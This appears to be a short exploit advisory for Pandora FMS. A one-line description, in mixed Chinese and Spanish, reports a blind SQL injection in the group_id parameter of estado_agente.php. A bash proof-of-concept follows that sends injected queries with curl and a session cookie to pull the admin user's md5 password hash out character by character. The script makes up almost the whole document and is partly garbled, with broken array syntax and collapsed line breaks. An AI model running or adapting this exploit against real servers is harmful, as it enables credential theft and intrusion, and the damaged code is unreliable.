参数group_id操作/ agentes / estado_agente.php产生盲目SQL注入。
PoC:
Exploit:
#!/bin/bash # Pandora Flexible Monitoring System Blind SQL Injection PoC # Juan Galiana Lara # Gets the md5 hash password from a specific user # #configure host,cookie&group_id before use it #usage #$ ./getpassword.sh #74b444ff2785ea8bb9ae02c13b6a71f1 HOST="HOST" TARGET_USER="0x61646d696e" #admin PATTERN="Interval" COOKIE="rq842tci6e5ib7t918c6sv1ml4" CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z) GROUP_ID=2 j=1 while [[ $j -lt 33 ]]; do i=0 while [[ $i -lt ${#CHARSET[ () ]} ]]; do c=$(printf %d "${CHARSET[$i]}") URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281";; curl $URL --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q $PATTERN; if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi; let i++ done; if [[ $i -eq ${#CHARSET[ () ]} ]]; then echo "Something went wrong!"; exit 1; fi let j++; done echo exit 0